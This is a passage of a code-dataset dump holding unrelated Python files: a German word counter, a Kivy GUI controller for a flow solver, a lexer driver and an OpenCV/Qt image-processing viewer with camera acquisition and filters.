'sechsten', 'nur', 'im', 'durch',\n 'siebenten', 'folgende', 'ganzen', 'denen', 'zweiter', 'k', 'sondern', 'kommt', 'welches', 'g', 'm', 'am',\n 'jahre', 'en', 'vierter', 'leide', 'bis', 'sein', 'jedoch', 'eigen', 'elf', 'weit', 'bisher', 'e',\n 'müssen', 'groß', 'kam', 'dritte', 'dritter', 'mochte', 'desselben', 'einige', 'eines', 'nun', 'sollen',\n 'allgemeinen', 'satt', 'daß', 'tagen', 'leicht', 'manche', 'kleine', 'gemusst', 'noch', 'lange', 'v',\n 'weshalb', 'eins', 'achtes', 'nichts', 'weiter', 'fünften', 'diejenige', 'gesagt', 'doch', 'wenig',\n 'kannst', 'beispiel', 'zurück', 'warum', 'sah', 'kleines', 'anderr', 'wo', 'guter', 'sonst', 'mancher',\n 'eures', 'dermaßen', 'müsst', 'sechster', 'h', 'genug', 'als', 'des', 'neben', 'gekonnt', 'geht', 'um',\n 'Zudem', 'document',\n }\n\ndatei = input(\"Textdatei: \")\ncontent = open(datei).read()\nfor zeichen in string.punctuation:\n content = content.replace(zeichen, \" \").lower()\nwoerter = content.split()\nword = [w for w in woerter if w not in STOPWORDS]\ndict = {}\nfor i in word:\n dict[i] = word.count(i)\n\nsorted_dict = sorted(dict.items(), key=operator.itemgetter(1))\nsorted_dict.reverse()\nprint(sorted_dict) \n","repo_name":"tschaeggi/Wordcounter3000","sub_path":"wordcounter3000.py","file_name":"wordcounter3000.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"als","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2375021742","text":"import kivy\nkivy.require('1.0.7')\nfrom kivy.app import App\nfrom Model import *\nimport StringIO\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg\nfrom matplotlib.figure import Figure\nimport numpy as np\nfrom kivy.core.image.img_pygame import ImageLoaderPygame\nfrom kivy.properties import ObjectProperty\nfrom kivy.uix.image import Image\nfrom kivy.lang import Builder\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.button import Button\nfrom kivy.properties import *\nfrom kivy.core.image import Image as CoreImage\nfrom kivy.animation import Animation\nimport re\n\"\"\"\nController\n\nThe driver for the PyCamellia GUI. Main also assumes the\nresponsibility of reading and writing to the view (test.kv).\n\"\"\"\nclass Controller(object):\n\n def __init__(self):\n self.model = Model()\n \n \"\"\"\n Do this when refine is pressed.\n \"\"\"\n def pressRefine(self, rType): \n self.model.refine(rType)\n\n\n \"\"\"\n Convert a matplotlib.Figure to PNG image.:returns: PNG image bytes\n \"\"\"\n #def fig2png(self, fig):\n # data = StringIO.StringIO()\n # canvas = FigureCanvasAgg(fig)\n # canvas.print_png(data)\n # return data.getvalue()\n\n\n\n\n \"\"\"\n Do this when plot is pressed.\n \"\"\"\n def pressPlot(self, plotType, numPlots):\n \n self.model.plot(plotType, numPlots)\n \n \n \n \n \n \"\"\"\n Do this when reset is pressed.\n \"\"\"\n def pressReset(self):\n self.model.reset()\n pass\n\n \"\"\"\n Do this when solve is pressed.\n \"\"\"\n def pressSolve(self, data):\n results = self.model.solve(data)\n print(type(results))\n return results # either a form or errors\n \n \"\"\"\n Do this when load is pressed.\n \"\"\"\n def pressLoad(self, filename):\n self.model.load(filename)\n\n \"\"\"\n Do this when save is pressed.\n \"\"\"\n def pressSave(self, filename):\n self.model.save(filename)\n\n\n\n# Screen Accessors & Mutators ------------------------------------\n \n\n \n \n\n\n\n\"\"\"\nViewApp\n\nDesign elements are contained in the PyCamellia.kv file\nwhich kivy will look in when the program starts.\n\nKivy requires this class for interacting with view (PyCamellia.kv),\nalthough it is somewhat redundant to Controller.\n\"\"\"\nclass ViewApp(App):\n #self.root.status = \"running\"\n title = 'PyCamellia Incompressible Flow Solver'\n \"\"\"\n Added this build function so we can maipulate viewApp when it is created. \n We just need to specify which .kv file we are building from.\n \"\"\"\n def build(self):\n self.controller = Controller()\n self.numPlots = 0\n # Setting root as the instance variable needed to reference the GUI\n self.root = Builder.load_file('View.kv')\n return self.root\n\n \"\"\"\n Refine the mesh of the current form\n \"\"\"\n def refine(self, input):\n self.root.status = \"Refining...\"\n if(input[0] == 'h'):\n self.controller.pressRefine(0)\n else:\n self.controller.pressRefine(1)\n self.root.status = \"Refined.\"\n def plot(self, input):\n self.root.status = \"Plotting...\"\n self.numPlots += 1\n self.controller.pressPlot(input, self.numPlots)\n self.root.plot_image = '/tmp/plot'+str(self.numPlots)+'.png'\n \n self.root.status = \"Plotted.\"\n \n \"\"\"\n Clear all fields on the screen\n \"\"\"\n def reset(self):\n # So we don't write out self.root.ids each time:\n r = self.root.ids\n r.probType.clear()\n r.stateType.clear()\n r.refine.clear()\n r.refine.disabled=True\n r.plot.clear()\n r.plot.disabled=True\n r.polyOrder.clear()\n r.meshElems.clear()\n r.meshDim.clear()\n r.reynolds.clear()\n r.out1.clear()\n r.out2.clear()\n r.out3.clear()\n r.out4.clear()\n r.inf1.clear()\n r.inf1_x.clear()\n r.inf1_y.clear()\n r.inf2.clear()\n r.inf2_x.clear()\n r.inf2_y.clear()\n r.inf3.clear()\n r.inf3_x.clear()\n r.inf3_y.clear()\n r.inf4.clear()\n r.inf4_x.clear()\n r.inf4_y.clear()\n r.save.clear()\n r.save.disabled=True\n r.filename.clear()\n self.root.energyError = \"\"\n self.controller.pressReset()\n\n \"\"\"\n Grab the input from the screen, then create and solve a form\n with that input. Be sure along the way that all necessary\n data is present and valid.\n \"\"\"\n def solve(self):\n self.root.status = \"Solving...\"\n missingEntry = False # Set to true if an important field is left blank\n data = {}\n r = self.root.ids\n data[\"type\"] = self.root.ids.probType.text\n # Still says 'Problem Type' so nothing was selected\n if data[\"type\"][:1] == 'P': \n missingEntry = True\n self.root.ids.probType.highlight()\n elif data[\"type\"][:1] == 'S':\n data[\"stokes\"] = True\n elif data[\"type\"][:1] == 'N':\n data[\"stokes\"] = False\n if data[\"type\"][:3] == 'Nav':\n data[\"reynolds\"] = self.root.ids.reynolds.text\n # If no Reynolds number specified AND problem type is NOT Stokes\n if ((data[\"reynolds\"] == '') and not(data[\"type\"][:1] == 'S')):\n missingEntry = True\n self.root.ids.reynolds.highlight()\n data[\"state\"] = self.root.ids.stateType.text\n # Still says 'State' so nothing was selected\n if data[\"state\"][:3] == 'Sta':\n missingEntry = True\n self.root.ids.stateType.highlight()\n elif data[\"state\"][:3] == 'Tra':\n data[\"transient\"] = True\n elif data[\"state\"][:3] == 'Ste':\n data[\"transient\"] = False\n data[\"polyOrder\"] = self.root.ids.polyOrder.text\n # Is empty so no value was given\n if data[\"polyOrder\"] == '':\n missingEntry = True\n self.root.ids.polyOrder.highlight()\n data[\"numElements\"] = self.root.ids.meshElems.text\n # Is empty so no value was given\n if data[\"numElements\"] == '':\n missingEntry = True\n self.root.ids.meshElems.highlight()\n data[\"meshDimensions\"] = self.root.ids.meshDim.text\n # Is empty so no value was given\n if data[\"meshDimensions\"] == '':\n missingEntry = True\n self.root.ids.meshDim.highlight()\n\n data[\"inflows\"] = []\n\n if r.inf1.text != \"\" and r.inf1_x.text != \"\" and r.inf1_y.text != \"\":\n data[\"inflows\"].append((r.inf1.text,r.inf1_x.text,r.inf1_y.text))\n elif r.inf1.text != \"\" or r.inf1_x.text != \"\" or r.inf1_y.text != \"\":\n missingEntry = True\n r.inf1.highlight()\n r.inf1_x.highlight()\n r.inf1_y.highlight()\n if r.inf2.text != \"\" and r.inf2_x.text != \"\" and r.inf2_y.text != \"\":\n data[\"inflows\"].append((r.inf2.text,r.inf2_x.text,r.inf2_y.text))\n elif r.inf2.text != \"\" or r.inf2_x.text != \"\" or r.inf2_y.text != \"\":\n missingEntry = True\n r.inf2.highlight()\n r.inf2_x.highlight()\n r.inf2_y.highlight()\n if r.inf3.text != \"\" and r.inf3_x.text != \"\" and r.inf3_y.text != \"\":\n data[\"inflows\"].append((r.inf2.text,r.inf2_x.text,r.inf2_y.text))\n elif r.inf3.text != \"\" or r.inf3_x.text != \"\" or r.inf3_y.text != \"\":\n missingEntry = True\n r.inf3.highlight()\n r.inf3_x.highlight()\n r.inf3_y.highlight()\n if r.inf4.text != \"\" and r.inf4_x.text != \"\" and r.inf4_y.text != \"\":\n data[\"inflows\"].append((r.inf4.text,r.inf4_x.text,r.inf4_y.text))\n elif r.inf4.text != \"\" or r.inf4_x.text != \"\" or r.inf4_y.text != \"\":\n missingEntry = True\n r.inf4.highlight()\n r.inf4_x.highlight()\n r.inf4_y.highlight() \n\n data[\"outflows\"] = []\n\n if r.out1.text != \"\":\n data[\"outflows\"].append(r.out1.text)\n if r.out2.text != \"\":\n data[\"outflows\"].append(r.out2.text)\n if r.out3.text != \"\":\n data[\"outflows\"].append(r.out3.text)\n if r.out4.text != \"\":\n data[\"outflows\"].append(r.out4.text)\n \n # don't solve unless we have all necessary entries\n if not(missingEntry):\n # Clear all inflows that have potentially have been highlighted\n if r.inf1.text == \"\":\n r.inf1.clear()\n r.inf1_x.clear()\n r.inf1_y.clear()\n if r.inf2.text == \"\":\n r.inf2.clear()\n r.inf2_x.clear()\n r.inf2_y.clear()\n if r.inf3.text == \"\":\n r.inf3.clear()\n r.inf3_x.clear()\n r.inf3_y.clear()\n if r.inf4.text == \"\":\n r.inf4.clear()\n r.inf4_x.clear()\n r.inf4_y.clear()\n if r.out1.text == \"\":\n r.out1.clear()\n if r.out2.text == \"\":\n r.out2.clear()\n if r.out3.text == \"\":\n r.out3.clear()\n if r.out4.text == \"\":\n r.out4.clear()\n\n self.root.ids.save.disabled=False\n self.root.ids.plot.disabled=False\n self.root.ids.refine.disabled=False\n results = self.controller.pressSolve(data)\n if isinstance(results,dict): # if it's a dict of errors\n self.setErrors(results)\n else:\n print(type(results))\n mesh = results.solution().mesh()\n if(data[\"stokes\"]):\n self.root.energyError = str(results.solution().energyErrorTotal())\n self.root.degreesFreedom = str(mesh.numGlobalDofs())\n self.root.numElements = str(mesh.numActiveElements())\n else:\n self.root.energyError = str(results.solutionIncrement().energyErrorTotal())\n self.root.degreesFreedom = str(mesh.numGlobalDofs())\n self.root.numElements = str(mesh.numActiveElements())\n self.root.status = \"Solved.\"\n return\n else:\n self.root.status = \"Missing entries.\"\n\n def getFilename(self):\n filename = self.root.ids.filename.text\n if filename == '':\n self.root.ids.filename.highlight()\n return filename\n def load(self):\n filename = self.getFilename()\n if(filename == ''):\n return\n self.controller.pressLoad(filename)\n def save(self):\n filename = self.getFilename()\n if(filename == ''):\n return\n self.controller.pressSave(filename)\n\n \"\"\"\n Set the input errors on the GUI\n errors: A map from field to boolean, True if error, False if no error\n \"\"\"\n def setErrors(self, errors):\n r = self.root.ids\n if errors[\"reynolds\"]:\n r.reynolds.highlight()\n if errors[\"polyOrder\"]:\n r.polyOrder.highlight()\n if errors[\"numElements\"]:\n r.meshElems.highlight()\n if errors[\"meshDimensions\"]:\n r.meshDim.highlight()\n for i in range(0, len(errors[\"inflows\"])):\n if (i == 0) and errors[\"inflows\"][i]:\n r.inf1.highlight()\n r.inf1_x.highlight()\n r.inf1_y.highlight()\n elif (i == 1) and errors[\"inflows\"][i]:\n r.inf2.highlight()\n r.inf2_x.highlight()\n r.inf2_y.highlight()\n elif (i == 2) and errors[\"inflows\"][i]:\n r.inf3.highlight()\n r.inf3_x.highlight()\n r.inf3_y.highlight()\n elif (i == 3) and errors[\"inflows\"][i]:\n r.inf4.highlight()\n r.inf4_x.highlight()\n r.inf4_y.highlight()\n for i in range(0, len(errors[\"outflows\"])):\n if (i == 0) and errors[\"outflows\"][i]:\n r.out1.highlight()\n elif (i == 1) and errors[\"outflows\"][i]:\n r.out2.highlight()\n elif (i == 2) and errors[\"outflows\"][i]:\n r.out3.highlight()\n elif (i == 3) and errors[\"outflows\"][i]:\n r.out4.highlight()\n \n \n\"\"\"\n\"\"\"\nclass PyTextInput(TextInput):\n reset_text = StringProperty(\"\")\n def highlight(self):\n self.background_color=(1,0,0,1)\n def clear(self):\n self.background_color=(1,1,1,1)\n self.text=self.reset_text\n\n\"\"\"\n\"\"\"\nclass PyButton(Button):\n reset_text = StringProperty(\"\")\n def highlight(self):\n self.background_color=(1,0,0,1)\n def clear(self):\n self.background_color=(1,1,1,1)\n self.text=self.reset_text\n\nclass PyDropButton(PyButton):\n def clear(self):\n super(PyDropButton, self).clear()\n self.italic=True\n\nif __name__ == '__main__':\n ViewApp().run()\n\n","repo_name":"laurajauch/phase3","sub_path":"Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":12933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21037464420","text":"from lexer import Lexer\nfrom parserTB import Parser\nfrom tabulate import tabulate\n\n#scanner_text_input = \"/-This is main function \\nIre@decrease(){\\nIre@3num=5;\\nRingWhen (counter.\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib import __version__ as mplver\r\nfrom matplotlib.image import imread as mplimread\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.backends.backend_qtagg import FigureCanvas\r\n\r\nimport sys\r\n\r\nfrom pathlib import Path\r\nimport inspect\r\nfrom importlib import resources as DataRes\r\n\r\nfrom threading import Thread\r\n\r\nfrom matplotlib.backends.qt_compat import QtCore, QtWidgets, QtGui\r\n\r\n\r\nclass SacWindow(QtWidgets.QMainWindow):\r\n \"\"\"\r\n Main Qt Window for Sacvision\r\n \"\"\"\r\n\r\n def __init__(self, parent=None):\r\n super(SacWindow, self).__init__(parent)\r\n self.resize(512, 512)\r\n self.move(300, 300)\r\n self.setWindowTitle('Sacvision 0.0.1')\r\n \r\n self.statusBar().showMessage('Sacvision 0.0.1. (c) Luis Díaz Saco')\r\n self.header = QtWidgets.QLabel()\r\n self.header.setAlignment(QtCore.Qt.AlignCenter)\r\n \r\n if __name__ == '__main__':\r\n local_dir = Path(inspect.getabsfile(SacWindow)).parent.resolve()\r\n logo_name = str(local_dir / 'data/logo_saconsulting.png')\r\n self.header.setPixmap(QtGui.QPixmap(logo_name))\r\n self.setWindowIcon(QtGui.QIcon(logo_name))\r\n else:\r\n res_file = DataRes.files(\"sacvision\")\r\n res_file = res_file / \"data\" / \"logo_saconsulting.png\"\r\n logo_data = res_file.read_bytes()\r\n logo_pixmap = QtGui.QPixmap()\r\n logo_pixmap.loadFromData(logo_data,'PNG')\r\n self.header.setPixmap(logo_pixmap)\r\n logo_icon = QtGui.QIcon()\r\n logo_icon.addPixmap(logo_pixmap.copy())\r\n self.setWindowIcon(logo_icon)\r\n \r\n self.pixmapit = None\r\n self.graphicsscene = QtWidgets.QGraphicsScene(0, 0, 512, 512)\r\n self.graphicsview = QtWidgets.QGraphicsView(self.graphicsscene)\r\n self.graphicsview.setMinimumSize(512, 512)\r\n self.graphicsview.setFrameStyle(0)\r\n self.pixmap = None\r\n\r\n self.histo = SacHistoWidget(Figure(figsize=(5, 3), dpi=70))\r\n self.histo.setMinimumSize(256, 100)\r\n mainlayout = QtWidgets.QGridLayout()\r\n\r\n layout = [self.header, self.histo]\r\n\r\n for i in range(len(layout)):\r\n mainlayout.addWidget(layout[i], 0, i)\r\n mainlayout.addWidget(self.graphicsview, 1, 0, 1, 2)\r\n\r\n self.centralwidget = QtWidgets.QWidget(self)\r\n self.setCentralWidget(self.centralwidget)\r\n\r\n self.mainproc = SacProcess()\r\n self.acqthread = None\r\n\r\n filemenu = {\"New\": self.getnew,\r\n \"Open\": self.openfile,\r\n \"Save\": self.savefile,\r\n \"Quit\": self.close\r\n }\r\n\r\n acqmenu = {\"Start\": self.startAcquisition,\r\n \"Stop\": self.stopAcquisition\r\n }\r\n\r\n viewmenu = {\"Input\": self.showinput,\r\n \"Output\": self.showoutput\r\n }\r\n\r\n opsmenu = {\"None\": self.filternone,\r\n \"Edges\": self.filteredges,\r\n \"Smooth\": self.filtersmooth,\r\n \"Freq\": self.filterfreq\r\n }\r\n\r\n hlpmenu = {\"About\": self.aboutmessage,\r\n \"Qt Version\": self.qtversion,\r\n \"Other libraries\": self.libraries,\r\n \"License\": self.saclicense\r\n }\r\n\r\n menu = self.menuBar()\r\n file = menu.addMenu(\"File\")\r\n acq = menu.addMenu(\"Acquisition\")\r\n view = menu.addMenu(\"View\")\r\n ops = menu.addMenu(\"Operations\")\r\n hlp = menu.addMenu(\"Help\")\r\n\r\n self.vwgroup = QtWidgets.QActionGroup(self)\r\n self.opsgroup = QtWidgets.QActionGroup(self)\r\n\r\n self.actions = {}\r\n\r\n for entry, function in filemenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n file.addAction(f)\r\n f.setStatusTip(\"File actions\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n\r\n for entry, function in acqmenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n acq.addAction(f)\r\n f.setStatusTip(\"Acquisition actions\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n\r\n for entry, function in viewmenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n self.vwgroup.addAction(f)\r\n f.setCheckable(True)\r\n view.addAction(f)\r\n f.setStatusTip(\"View images\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n self.vwgroup.setExclusive(True)\r\n\r\n for entry, function in opsmenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n self.opsgroup.addAction(f)\r\n f.setCheckable(True)\r\n ops.addAction(f)\r\n f.setStatusTip(\"Operations\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n self.opsgroup.setExclusive(True)\r\n\r\n for entry, function in hlpmenu.items():\r\n f = QtWidgets.QAction(entry, self)\r\n hlp.addAction(f)\r\n f.setStatusTip(\"Help actions\")\r\n f.triggered.connect(function)\r\n self.actions[entry] = f\r\n\r\n self.actions['Input'].setChecked(True)\r\n self.actions['None'].setChecked(True)\r\n\r\n self.actions['Stop'].setEnabled(False)\r\n self.actions['Save'].setEnabled(False)\r\n self.vwgroup.setEnabled(False)\r\n\r\n self.centralwidget.setLayout(mainlayout)\r\n self.adjustSize()\r\n\r\n def processingmenu(self):\r\n self.close()\r\n \r\n def showimage(self):\r\n if self.pixmapit is not None:\r\n self.graphicsscene.removeItem(self.pixmapit)\r\n self.pixmapit = self.graphicsscene.addPixmap(self.pixmap)\r\n sc = self.graphicsscene\r\n sc.setSceneRect(0, 0, self.pixmap.width(),\r\n self.pixmap.height())\r\n self.graphicsview.setFixedSize(self.pixmap.width(),\r\n self.pixmap.height())\r\n sc.update(sc.sceneRect())\r\n self.adjustSize()\r\n\r\n def showhistogram(self):\r\n if self.mainproc.histim is None:\r\n self.mainproc.gethist(self.inp)\r\n self.histo.putdata(self.mainproc.histim)\r\n self.histo.plot()\r\n \r\n def getnew(self):\r\n self.mainproc.getnew()\r\n self.showinput()\r\n self.actions['Save'].setEnabled(False)\r\n self.vwgroup.setEnabled(True)\r\n\r\n def openfile(self):\r\n fname, ftype = QtWidgets.QFileDialog.getOpenFileName(\r\n self, 'Open file', '.', \"Image files (*.jpg *.gif)\")\r\n if len(fname) > 0:\r\n self.mainproc.setparam(fname)\r\n self.mainproc.getinput()\r\n self.showinput()\r\n self.actions['Save'].setEnabled(False)\r\n self.vwgroup.setEnabled(True)\r\n if self.mainproc.filter == 'None':\r\n self.actions['Output'].setEnabled(False)\r\n else:\r\n self.actions['Output'].setEnabled(True)\r\n self.update()\r\n\r\n def savefile(self):\r\n fname, ftype = QtWidgets.QFileDialog.getSaveFileName(\r\n self, 'Save file', '.', \"Image files (*.jpg *.gif)\")\r\n if len(fname) > 0:\r\n self.mainproc.saveoutput(fname)\r\n\r\n def startAcquisition(self):\r\n self.actions['Start'].setEnabled(False)\r\n self.actions['Stop'].setEnabled(True)\r\n self.vwgroup.setEnabled(False)\r\n self.opsgroup.setEnabled(False)\r\n self.statusBar().showMessage('Acquiring image from camera')\r\n \r\n if self.mainproc.filter is None:\r\n self.mainproc.filter = 'None'\r\n self.acqthread = SacFilterAcquisition(self)\r\n self.acqthread.start()\r\n\r\n def stopAcquisition(self):\r\n if self.acqthread is not None and self.acqthread.is_alive():\r\n self.mainproc.inp = self.acqthread.stopAcquisition()\r\n self.showinput()\r\n self.actions['Stop'].setEnabled(False)\r\n self.actions['Start'].setEnabled(True)\r\n self.vwgroup.setEnabled(True)\r\n if self.mainproc.filter == 'None':\r\n self.actions['Output'].setEnabled(False)\r\n else:\r\n self.actions['Output'].setEnabled(True)\r\n self.opsgroup.setEnabled(True)\r\n self.statusBar().showMessage('End of acquisition')\r\n\r\n def showinput(self):\r\n self.pixmap = self.mainproc.showinput()\r\n self.mainproc.gethist(self.mainproc.inp)\r\n self.showhistogram()\r\n self.showimage()\r\n self.update()\r\n self.actions['Input'].setChecked(True)\r\n self.statusBar().showMessage('Input Image')\r\n\r\n def showoutput(self):\r\n self.pixmap = self.mainproc.showoutput()\r\n self.mainproc.gethist(self.mainproc.outp)\r\n self.showhistogram()\r\n self.showimage()\r\n if self.mainproc.outp is not None:\r\n self.update()\r\n self.actions['Output'].setChecked(True)\r\n self.actions['Save'].setEnabled(True)\r\n self.statusBar().showMessage('Output Image')\r\n\r\n def filternone(self):\r\n self.mainproc.filternone()\r\n if self.mainproc.inp is not None:\r\n self.showinput()\r\n self.actions['Output'].setEnabled(False)\r\n self.actions['Save'].setEnabled(False)\r\n self.actions['Input'].setChecked(True)\r\n self.statusBar().showMessage('Input Image')\r\n\r\n def filteredges(self):\r\n self.mainproc.filteredges()\r\n if self.mainproc.inp is not None:\r\n self.showoutput()\r\n self.actions['Output'].setEnabled(True)\r\n self.actions['Output'].setChecked(True)\r\n self.statusBar().showMessage('Output Image')\r\n\r\n def filtersmooth(self):\r\n self.mainproc.filtersmooth()\r\n if self.mainproc.inp is not None:\r\n self.showoutput()\r\n self.actions['Output'].setEnabled(True)\r\n self.actions['Output'].setChecked(True)\r\n self.statusBar().showMessage('Output Image')\r\n\r\n def filterfreq(self):\r\n self.mainproc.filterfreq()\r\n if self.mainproc.inp is not None:\r\n self.showoutput()\r\n self.actions['Output'].setEnabled(True)\r\n self.actions['Output'].setChecked(True)\r\n self.statusBar().showMessage('Output Image')\r\n\r\n def aboutmessage(self):\r\n QtWidgets.QMessageBox.about(self, \"About\", \"Sacvision 0.0.1\\n\\n\"\r\n \"(c) 2017-2022 Luis Díaz Saco\\n\\n\"\r\n \"Distributed under GNU AGPLv3 License\")\r\n\r\n def qtversion(self):\r\n QtWidgets.QMessageBox.aboutQt(self, \"Qt Version\")\r\n\r\n def libraries(self):\r\n mplstr = 'Matplotlib version ' + mplver + '\\n\\n'\r\n ocvstr = 'Opencv version ' + cv2.__version__ + '\\n\\n'\r\n npstr = 'Numpy version ' + np.__version__\r\n QtWidgets.QMessageBox.information(self, \"Using libraries\",\r\n mplstr + ocvstr + npstr)\r\n\r\n def saclicense(self):\r\n QtWidgets.QMessageBox.information(self, \"License\",\r\n \"This program is free software: you can redistribute it and/or \"\r\n \"modify it under the terms of the GNU Affero General Public \"\r\n \"License as published by the Free Software Foundation, either \"\r\n \"version 3 of the License, or any later version.\\n\\n\"\r\n \"This program is distributed in the hope that it will be useful,\"\r\n \" but WITHOUT ANY WARRANTY; without even the implied warranty of\"\r\n \" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\"\r\n \" GNU Affero General Public License for more details.\\n\\n\"\r\n \"You should have received a copy of the GNU Affero General Public \"\r\n \"License along with this program. If not, see \"\r\n \".\\n\\n\"\r\n \"Contact the author at saconsultingacs@outlook.com\")\r\n\r\n def closeEvent(self, event):\r\n self.mainproc.close()\r\n\r\n def paintEvent(self, event):\r\n if self.pixmap is not None:\r\n self.showimage()\r\n super(SacWindow, self).paintEvent(event)\r\n\r\n\r\nclass SacThreadOperation(Thread):\r\n \"\"\"\r\n Base class for different operations with images\r\n \"\"\"\r\n\r\n def __init__(self, window=None):\r\n Thread.__init__(self)\r\n self.image = None\r\n self.isRunning = False\r\n self.window = window\r\n\r\n def mainloop(self):\r\n if self.initcamera():\r\n self.initscreen()\r\n self.isRunning = True\r\n while (self.isRunning):\r\n if self.acquireimage():\r\n self.mainoperation()\r\n self.closecamera()\r\n self.closescreen()\r\n\r\n def initcamera(self):\r\n self.cap = cv2.VideoCapture(0)\r\n if self.cap.isOpened():\r\n return True\r\n else:\r\n print(\"I cannot open camera\")\r\n self.cap.release()\r\n return False\r\n\r\n def initscreen(self):\r\n pass\r\n\r\n def acquireimage(self):\r\n ret, self.image = self.cap.read()\r\n return ret\r\n\r\n def closecamera(self):\r\n self.cap.release()\r\n\r\n def closescreen(self):\r\n pass\r\n\r\n def mainoperation(self):\r\n pass\r\n\r\n def stopAcquisition(self):\r\n self.isRunning = False\r\n return self.image\r\n\r\n def run(self):\r\n self.mainloop()\r\n\r\n\r\nclass SacAcquisitioncv(SacThreadOperation):\r\n \"\"\"\r\n Initial class to acquire images using the OpenCV interface.\r\n It is not used with the Qt interface\r\n \"\"\"\r\n\r\n def __init(self, window=None):\r\n SacThreadOperation.__init__(self, window)\r\n self.windowName = 'Saconsulting Acquisition'\r\n\r\n def closescreen(self):\r\n cv2.destroyWindow(self.windowName)\r\n\r\n def mainoperation(self):\r\n cv2.imshow(self.windowName, self.image)\r\n\r\n\r\nclass SacAcquisition(SacThreadOperation):\r\n \"\"\"\r\n Acquire images through the Qt interface.\r\n Show the source image from the camera.\r\n \"\"\"\r\n\r\n def __init__(self, window=None):\r\n SacThreadOperation.__init__(self, window)\r\n\r\n def initscreen(self):\r\n width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n self.window.graphicsscene.setSceneRect(0, 0, width, height)\r\n self.window.graphicsview.setFixedSize(width, height)\r\n self.window.update()\r\n self.window.adjustSize()\r\n\r\n def mainoperation(self):\r\n if self.window is not None:\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(self.image)\r\n self.window.mainproc.gethist(self.image)\r\n self.window.showhistogram()\r\n self.window.update()\r\n\r\n\r\nclass SacEdgesAcquisition(SacAcquisition):\r\n \"\"\"\r\n Acquire images through the Qt interface.\r\n Shows an edge detection operator of the source image from the camera\r\n \"\"\"\r\n\r\n def mainoperation(self):\r\n if self.window is not None:\r\n im = self.window.mainproc.doprocessedges(self.image)\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(im)\r\n self.window.mainproc.gethist(im)\r\n self.window.showhistogram()\r\n self.window.update()\r\n\r\n\r\nclass SacSmoothAcquisition(SacAcquisition):\r\n \"\"\"\r\n Acquire images through the Qt interface.\r\n Shows the smoothed image of the source image from the camera\r\n \"\"\"\r\n\r\n def mainoperation(self):\r\n if self.window is not None:\r\n im = self.window.mainproc.doprocesssmooth(self.image)\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(im)\r\n self.window.mainproc.gethist(im)\r\n self.window.showhistogram()\r\n self.window.update()\r\n\r\nclass SacFreqAcquisition(SacAcquisition):\r\n \"\"\"\r\n Acquire images through the Qt interface.\r\n Shows the smoothed image of the source image from the camera\r\n \"\"\"\r\n\r\n def mainoperation(self):\r\n if self.window is not None:\r\n im = self.window.mainproc.doprocessfrequency(self.image)\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(im)\r\n self.window.mainproc.gethist(im)\r\n self.window.showhistogram()\r\n self.window.update()\r\n \r\nclass SacFilterAcquisition(SacAcquisition):\r\n \"\"\"\r\n Acquire image through the Qt interface.\r\n Shows a filtered image of the source image from the camera\r\n \"\"\"\r\n \r\n def mainoperation(self):\r\n if self.window is not None:\r\n im = self.window.mainproc.applyfilter(self.image)\r\n self.window.pixmap = self.window.mainproc.createfromBGRimage(im)\r\n self.window.mainproc.gethist(im)\r\n self.window.showhistogram()\r\n self.window.update()\r\n\r\n\r\nclass SacHistoWidget(FigureCanvas):\r\n \"\"\"\r\n Draw an histogram from a set of data\r\n \"\"\"\r\n\r\n def __init__(self, fig):\r\n super().__init__(fig)\r\n self.data = np.zeros(256)\r\n self.ax = self.figure.subplots()\r\n self.ax.plot(self.data)\r\n\r\n def putdata(self, data):\r\n self.data = data\r\n\r\n def plot(self):\r\n if self.data is not None:\r\n self.ax.clear()\r\n self.ax.plot(self.data)\r\n self.figure.canvas.draw()\r\n\r\n\r\nclass SacProcess():\r\n \"\"\"\r\n Define methods for image processing with OpenCV\r\n \"\"\"\r\n\r\n def __init__(self, param=None):\r\n self.inp = None\r\n self.outp = None\r\n self.histim = None\r\n self.filter = 'None'\r\n local_dir = Path(inspect.getabsfile(SacWindow)).parent.resolve()\r\n self.default_img = str(local_dir / 'data/lena.jpg')\r\n if param is None:\r\n self.param = self.default_img\r\n else:\r\n self.param = param\r\n\r\n def main(self):\r\n self.filteredges()\r\n\r\n def filternone(self):\r\n self.filter = 'None'\r\n if self.inp is not None:\r\n self.showinput()\r\n\r\n def filteredges(self):\r\n self.filter = 'Edges'\r\n if self.inp is not None:\r\n self.showoutput()\r\n\r\n def filtersmooth(self):\r\n self.filter = 'Smooth'\r\n if self.inp is not None:\r\n self.showoutput()\r\n\r\n def filterfreq(self):\r\n self.filter = 'Freq'\r\n if self.inp is not None:\r\n self.showoutput()\r\n\r\n def setparam(self, param=None):\r\n self.param = param\r\n\r\n def getnew(self):\r\n if __name__ == '__main__':\r\n self.inp = cv2.imread(self.default_img, cv2.IMREAD_COLOR)\r\n print('New input image set to the default image')\r\n else:\r\n res_file = DataRes.files(\"sacvision\")\r\n res_file = res_file / \"data\" / \"lena.jpg\"\r\n with DataRes.as_file(res_file) as data:\r\n inp_im = mplimread(data,'JPG')\r\n self.inp = cv2.cvtColor(inp_im,cv2.COLOR_RGB2BGR)\r\n\r\n def getinput(self):\r\n 